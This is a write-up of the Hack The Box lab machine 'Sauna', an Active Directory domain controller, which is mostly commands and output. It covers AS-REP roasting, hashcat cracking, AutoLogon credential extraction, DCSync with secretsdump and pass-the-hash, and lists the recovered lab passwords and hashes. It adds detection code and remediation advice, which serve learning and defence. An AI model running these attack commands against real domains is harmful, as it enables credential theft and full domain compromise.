EXPLOITATION // ACTIVE DIRECTORY
ATTACK VECTORS

- [+] Website OSINT - Employee Name Enumeration
- [+] Username Generation via username-anarchy
- [+] AS-REP Roasting (Kerberos Pre-Auth Disabled)
- [+] Hash Cracking with Hashcat
- [+] AutoLogon Credentials Discovery via WinPEAS
- [+] DCSync Attack (Replication Privilege Abuse)
- [+] Pass-the-Hash for Administrator Access
- >_ TARGET ACQUISITION
- >_ INITIAL RECONNAISSANCE
- >_ WEB ENUMERATION
- >_ FOOTHOLD // AS-REP ROASTING
- >_ PRIVILEGE ESCALATION
- >_ BLOODHOUND ANALYSIS
- >_ DCSYNC ATTACK
- >_ SYSTEM ACCESS OBTAINED
- >_ CREDENTIALS VAULT
- >_ MITRE ATT&CK MAPPING
- >_ LESSONS LEARNED
TARGET INFILTRATION PARAMETERS

| Parameter | Value |
|---|---|
| IP ADDRESS | 10.10.10.175 |
| HOSTNAME | SAUNA.EGOTISTICAL-BANK.LOCAL |
| DOMAIN | EGOTISTICAL-BANK.LOCAL |
| OPERATING SYSTEM | Windows Server 2019 (Active Directory DC) |
| DIFFICULTY | Easy |
| ATTACK SURFACE | Active Directory Domain Controller |
| KEY SERVICES | Kerberos, LDAP, SMB, WinRM, HTTP |
Add target to /etc/hosts using NetExec:

```shell
sudo nxc smb $RHOST --generate-hosts-file /etc/hosts
```

This automatically adds the domain and hostname to your hosts file for proper name resolution.
```shell
rustscan -a $RHOST --ulimit 5000 -r 1-65535 -- -A -Pn -oA Sauna_fullScan
```

```
Open 10.10.10.175:53
Open 10.10.10.175:80
Open 10.10.10.175:88
Open 10.10.10.175:135
Open 10.10.10.175:139
Open 10.10.10.175:389
Open 10.10.10.175:445
Open 10.10.10.175:464
Open 10.10.10.175:593
Open 10.10.10.175:3268
Open 10.10.10.175:5985
Open 10.10.10.175:9389
{SNIP - High ports 49667-49696}
```
Critical Ports Identified:
| Port | Service | Significance |
|---|---|---|
| 53 | DNS | Domain DNS resolution |
| 80 | HTTP | Microsoft IIS 10.0 - Bank Website (OSINT Target) |
| 88 | Kerberos | Authentication service - AS-REP Roasting target |
| 135 | MSRPC | Microsoft Windows RPC |
| 139 | NetBIOS | Microsoft Windows netbios-ssn |
| 389 | LDAP | Microsoft Windows AD LDAP |
| 445 | SMB | Windows Server 2019 Standard |
| 464 | Kpasswd5 | Kerberos password change |
| 593 | MSRPC | HTTP RPC Endpoint Mapper |
| 3268 | LDAP | Global Catalog |
| 5985 | WinRM | Remote PowerShell - shell access with valid creds |
| 9389 | .NET Message | AD Web Services |
KEY FINDINGS

- [+] Port 88 (Kerberos) - Target for AS-REP Roasting
- [+] Port 5985 (WinRM) - Remote shell access once creds obtained
- [+] Port 80 (HTTP) - Employee names for username generation
Browsing to port 80 reveals the Egotistical Bank corporate website. The "Meet The Team" page exposes employee names:

EMPLOYEES DISCOVERED

- Fergus Smith
- Shaun Coins
- Hugo Bear
- Bowie Taylor
- Sophie Driver
- Steven Kerb
Created target user list:

```shell
cat ~/users.txt
```

```
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie Driver
Steven Kerb
```

Used username-anarchy to generate AD username permutations:

```shell
./username-anarchy --input-file ~/users.txt > test_users.txt
cat test_users.txt
```

```
fergus
fergussmith
fergus.smith
fergussm
fergsmit
ferguss
f.smith
fsmith
sfergus
s.fergus
{SNIP}
```

VULNERABILITY IDENTIFIED

- TYPE: Kerberos Pre-Authentication Disabled
- TECHNIQUE: AS-REP Roasting (T1558.004)
- IMPACT: Offline password cracking without authentication
```shell
GetNPUsers.py -no-pass -usersfile test_users.txt -dc-ip $RHOST EGOTISTICAL-BANK.local/
```

```
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
{SNIP - Multiple failures}
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:a978c311c5bcae8b594f0ea98936089d$...
{SNIP - More failures}
```

Got hash for fsmith. Save it to a file and crack it with hashcat (the heredoc delimiter is quoted so the shell does not expand the `$krb5asrep$23$fsmith` parts of the hash as variables, and the hash file name must match the one passed to hashcat):

```shell
cat << 'EOF' > hash.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:a978c311c5bcae8b594f0ea98936089d$...
EOF
hashcat -m 18200 hash.txt rockyou.txt
```

```
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:...:Thestrokes23
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Time.Started.....: Sun Jan 11 11:44:37 2026 (1 sec)
Time.Estimated...: Sun Jan 11 11:44:38 2026 (0 secs)
{SNIP}
```

CREDENTIAL OBTAINED

- USERNAME: fsmith
- PASSWORD: Thestrokes23
```shell
evil-winrm -i $RHOST -u 'fsmith' -p 'Thestrokes23'
```

```
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
HTB{********_REDACTED_********}
```

Collected the domain for BloodHound with the fsmith credentials:

```shell
bloodhound-ce-python -c all -u fsmith -p 'Thestrokes23' -d EGOTISTICAL-BANK.LOCAL -ns $RHOST --zip
```

```
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 7 users
INFO: Found 52 groups
{SNIP}
INFO: Compressing output into 20260111114613_bloodhound.zip
```

Uploaded and ran WinPEAS through the WinRM session:

```
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload WinPEAS_64.exe
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\WinPEAS_64.exe
```

AUTOLOGON CREDENTIALS DISCOVERED

```
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
```

The AutoLogon entry names `svc_loanmanager`, but the password is valid for the `svc_loanmgr` account that actually exists in the domain (the secretsdump run below authenticates as it).

CREDENTIAL OBTAINED

- USERNAME: svc_loanmgr
- PASSWORD: Moneymakestheworldgoround!
BloodHound reveals svc_loanmgr has DCSync privileges (DS-Replication-Get-Changes):
ATTACK PATH IDENTIFIED

```
svc_loanmgr@EGOTISTICAL-BANK.LOCAL
  |
  +--[DCSync Rights]--> EGOTISTICAL-BANK.LOCAL (Domain)
  |
  +--> Full Credential Dump
```
VULNERABILITY IDENTIFIED

- TYPE: Excessive DCSync Privileges
- TECHNIQUE: DCSync (T1003.006)
- IMPACT: Complete domain credential compromise
```shell
secretsdump.py 'EGOTISTICAL-BANK'/'svc_loanmgr':'Moneymakestheworldgoround!'@'10.10.10.175'
```

```
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:ac100d89f65b041c0474cb0238fbdd16:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
{SNIP - Additional Kerberos keys}
[*] Cleaning up...
```

The `RemoteOperations failed` line is expected: svc_loanmgr has no remote-registry access on the DC, so secretsdump skips the SAM/LSA path and goes straight to the DRSUAPI replication method, which is the DCSync path itself.
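As an added, defender-side example (not from the writeup), the detection logic for both the AS-REP roast above and the DCSync just performed, run over constructed event records: Windows logs 4768 with Pre-Authentication Type 0 when a roastable AS-REP is issued, and 4662 carrying the DS-Replication-Get-Changes GUIDs when replication rights are exercised. The event dicts (field names mirroring the 4768/4662 EventData), their values, and the DC list (SAUNA$) are assumptions of this example.

```python
"""Detection logic for the two abuses in this writeup, run over constructed
event records (not real logs from the box): AS-REP roasting surfaces as 4768
with Pre-Authentication Type 0, DCSync as 4662 exercising a directory-
replication control-access right from an account that is not a DC."""
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Control-access-right GUIDs (AD schema) that DCSync needs on the domain object.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
CONTROL_ACCESS = 0x100  # 4662 AccessMask for extended/control-access rights
RC4_HMAC = 0x17         # etype 23: the format hashcat mode 18200 cracks

@dataclass
class Finding:
    event_id: int
    account: str
    reason: str

def check_4768(ev: dict) -> Optional[Finding]:
    """PreAuthType 0: the KDC issued an AS-REP with no pre-authentication,
    which is exactly what GetNPUsers.py harvests for offline cracking."""
    if ev.get("EventID") != 4768 or ev.get("PreAuthType") != 0:
        return None
    reason = "AS-REP issued without pre-authentication"
    if ev.get("TicketEncryptionType") == RC4_HMAC:
        reason += " (RC4 etype 23, crackable with hashcat -m 18200)"
    return Finding(4768, ev["TargetUserName"], reason)

def check_4662(ev: dict, dc_accounts: Iterable[str]) -> Optional[Finding]:
    """A replication right used by anything but a DC computer account is the
    DCSync signature; DCs exercise these rights against each other routinely."""
    if ev.get("EventID") != 4662 or ev.get("AccessMask") != CONTROL_ACCESS:
        return None
    used = {g.strip("{}").lower() for g in ev.get("Properties", [])}
    who = ev["SubjectUserName"]
    if not used & REPLICATION_GUIDS or who.upper() in map(str.upper, dc_accounts):
        return None
    return Finding(4662, who, "replication right used by a non-DC account")

def triage(events: Iterable[dict], dc_accounts=("SAUNA$",)) -> List[Finding]:
    """Run both checks; the default DC list is this writeup's single DC (assumed)."""
    found = [check_4768(ev) or check_4662(ev, dc_accounts) for ev in events]
    return [f for f in found if f]

# Constructed samples: fsmith roasted, hsmith a normal logon, svc_loanmgr
# running DCSync, and the DC SAUNA$ replicating legitimately.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "fsmith", "PreAuthType": 0,
     "TicketEncryptionType": 0x17},
    {"EventID": 4768, "TargetUserName": "hsmith", "PreAuthType": 2,
     "TicketEncryptionType": 0x12},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "AccessMask": 0x100,
     "Properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
                    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "AccessMask": 0x100,
     "Properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"]},
]
```

`triage(SAMPLE_EVENTS)` returns one finding for fsmith (4768) and one for svc_loanmgr (4662); the hsmith logon and the DC's own replication produce none.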
```shell
evil-winrm -i 10.10.10.175 -u 'Administrator' -H '823452073d75b9d1cf70ebdf86c7f98e'
```

```
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
HTB{********_REDACTED_********}
```

SYSTEM ACCESS OBTAINED

```
C:\Windows\system32> whoami
egotisticalbank\administrator
```
| Flag | Location | Value |
|---|---|---|
| User | C:\Users\FSmith\Desktop\user.txt | HTB{********_REDACTED_********} |
| Root | C:\Users\Administrator\Desktop\root.txt | HTB{********_REDACTED_********} |
EXFILTRATED CREDENTIALS

| TYPE | USERNAME | PASSWORD / HASH | SOURCE |
|---|---|---|---|
| Cleartext | fsmith | Thestrokes23 | AS-REP Roast + Hashcat |
| Cleartext | svc_loanmgr | Moneymakestheworldgoround! | AutoLogon Registry |
| NT Hash | Administrator | 823452073d75b9d1cf70ebdf86c7f98e | DCSync |
| NT Hash | HSmith | 58a52d36c84fb7f5f1beab9a201db1dd | DCSync |
| NT Hash | FSmith | 58a52d36c84fb7f5f1beab9a201db1dd | DCSync |
| NT Hash | krbtgt | 4a8899428cad97676ff802229e466e2c | DCSync |
| NT Hash | svc_loanmgr | 9cb31797c39a9b170b04058ba2bba48c | DCSync |

| Tactic | Technique ID | Technique Name | Implementation |
|---|---|---|---|
| Reconnaissance | T1595.002 | Active Scanning | Rustscan/Nmap |
| Reconnaissance | T1589.003 | Gather Employee Names | Website OSINT |
| Credential Access | T1558.004 | AS-REP Roasting | GetNPUsers.py |
| Credential Access | T1110.002 | Password Cracking | Hashcat |
| Initial Access | T1078 | Valid Accounts | fsmith via WinRM |
| Discovery | T1552.002 | Credentials in Registry | WinPEAS AutoLogon |
| Credential Access | T1003.006 | DCSync | secretsdump.py |
| Lateral Movement | T1550.002 | Pass-the-Hash | Evil-WinRM |

| Tool | Purpose |
|---|---|
| nxc (NetExec) | SMB enum & hosts file generation |
| rustscan | Fast port scanning |
| nmap | Service enumeration |
| username-anarchy | AD username generation |
| GetNPUsers.py | AS-REP Roasting |
| hashcat | Hash cracking (mode 18200) |
| bloodhound-ce-python | AD data collection |
| BloodHound CE | Attack path visualization |
| WinPEAS | Windows privesc enumeration |
| secretsdump.py | DCSync attack |
| Evil-WinRM | WinRM shell access |
KEY TAKEAWAYS

[1] Website OSINT is valuable
- Employee names from corporate websites can lead to valid AD usernames

[2] AS-REP Roasting
- Always check for accounts with Kerberos pre-authentication disabled
- Tools like username-anarchy help generate valid username formats

[3] AutoLogon = Free Credentials
- Windows AutoLogon stores passwords in registry (plaintext!)
- WinPEAS and other tools can extract these automatically

[4] Service Accounts are Dangerous
- Often have excessive privileges like DCSync rights
- Monitor and audit service account permissions regularly

[5] DCSync = Game Over
- Once you have replication rights, you own the domain
- Only Domain Controllers should have these permissions

[6] Password Reuse
- HSmith & FSmith share the same password hash
- Enforce unique passwords and implement password policies
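An added audit for takeaway [6] (not part of the writeup): it parses secretsdump-style dump lines, using the ones shown in the DCSync output above as sample input, and reports NT hashes shared between accounts, accounts carrying the empty-password hash, and any account still storing an LM hash. The parsing and checks are this example's own, not secretsdump's.

```python
"""Hygiene audit over a secretsdump-style NTDS dump (user:rid:lmhash:nthash:::)
for the problems the takeaways point at: NT hashes shared by several accounts
(password reuse, HSmith/FSmith here) and accounts carrying the empty-password
hash. Added example, not from the writeup; the dump lines below are the ones
shown in the writeup's secretsdump output, the checks are this example's own."""
import re
from collections import defaultdict
from typing import Dict, List

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored

LINE_RE = re.compile(
    r"^(?:(?P<domain>[^:\\]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")

def parse_dump(text: str) -> List[dict]:
    """Keep only credential lines; banner/status lines ([*], [-]) are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["lm"], d["nt"] = d["lm"].lower(), d["nt"].lower()
            entries.append(d)
    return entries

def audit(entries: List[dict]) -> Dict[str, object]:
    """Group accounts by NT hash. The empty-password hash is reported on its
    own rather than as 'reuse', since disabled accounts commonly share it."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    reused = {h: users for h, users in by_nt.items()
              if len(users) > 1 and h != EMPTY_NT}
    return {
        "reused": reused,
        "empty_password": by_nt.get(EMPTY_NT, []),
        "lm_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
    }

# Sample input: the dump lines shown earlier in this writeup.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:ac100d89f65b041c0474cb0238fbdd16:::
[*] Cleaning up...
"""
```

`audit(parse_dump(SAMPLE_DUMP))` flags the HSmith/FSmith hash as reused, Guest as the only empty-password account, and no stored LM hashes.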
BLOCKERS ENCOUNTERED

- Problem: Hashcat autodetect mode caused segmentation fault
  Solution: Explicitly specify hash mode with `-m 18200`
- Problem: GetNPUsers.py syntax confusion
  Solution: Correct syntax: `GetNPUsers.py -no-pass -usersfile FILE -dc-ip IP DOMAIN/`
REMEDIATION

[1] AS-REP Roasting Vulnerability
- Issue: fsmith has "Do not require Kerberos preauthentication" enabled
- Fix: Disable this setting for all accounts, enforce strong passwords

[2] AutoLogon Credentials
- Issue: svc_loanmgr password stored in registry plaintext
- Fix: Remove AutoLogon, use Group Managed Service Accounts (gMSA)

[3] Excessive DCSync Permissions
- Issue: Service account has DS-Replication-Get-Changes privileges
- Fix: Remove replication rights from non-DC accounts immediately
Techniques:
Tools:
Similar HTB Boxes:
- HTB Forest (AS-REP Roasting)
- HTB Active (Kerberoasting)
- HTB Resolute (AD Enumeration)
HOW TO FIND EXPLOITS & POC SCRIPTS

[1] IDENTIFY VERSION
- Use nmap, nxc to fingerprint OS and services
- Check LDAP/SMB banners for Windows version
- Example: Windows Server 2019, Kerberos 5

[2] SEARCH EXPLOIT-DB / SEARCHSPLOIT
- searchsploit windows server 2019
- searchsploit kerberos
- searchsploit active directory
- https://www.exploit-db.com/

[3] SEARCH CVE DATABASES
- https://nvd.nist.gov/ (NIST National Vulnerability Database)
- https://cve.mitre.org/ (CVE List)
- https://msrc.microsoft.com/ (Microsoft Security Response Center)

[4] GITHUB POC REPOSITORIES
- https://github.com/fortra/impacket (Impacket - AD attacks)
- https://github.com/GhostPack/Rubeus (Kerberos attacks)
- https://github.com/nomi-sec/PoC-in-GitHub (PoC aggregator)
- https://github.com/trickest/cve (CVE PoC collection)

[5] ACTIVE DIRECTORY RESOURCES
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
- https://adsecurity.org/ (AD Security Blog)
- https://www.thehacker.recipes/ (AD Attack Recipes)

[6] SECURITY RESEARCH RESOURCES
- https://github.com/swisskyrepo/PayloadsAllTheThings
- https://www.ired.team/ (Red Team Notes)
- https://pentestlab.blog/ (Pentestlab Blog)
VULNERABILITIES IN THIS BOX - SEARCH QUERIES

AS-REP Roasting (T1558.004)
- Tool: GetNPUsers.py (Impacket)
- https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py
- "AS-REP Roasting" kerberos pre-authentication
- Hashcat mode: 18200

AutoLogon Credentials (T1552.002)
- Tool: WinPEAS, reg query
- "windows autologon password registry"
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

DCSync Attack (T1003.006)
- Tool: secretsdump.py (Impacket)
- https://github.com/fortra/impacket/blob/master/examples/secretsdump.py
- "DCSync attack" DS-Replication-Get-Changes

Pass-the-Hash (T1550.002)
- Tools: evil-winrm, psexec.py, wmiexec.py
- "pass the hash" NTLM authentication
- WRITEUP AUTHOR: Netrunner
- COMPLETION DATE: 2026-01-11
- ATTACK CHAIN: OSINT > AS-REP Roast > AutoLogon > DCSync > Pass-the-Hash > SYSTEM


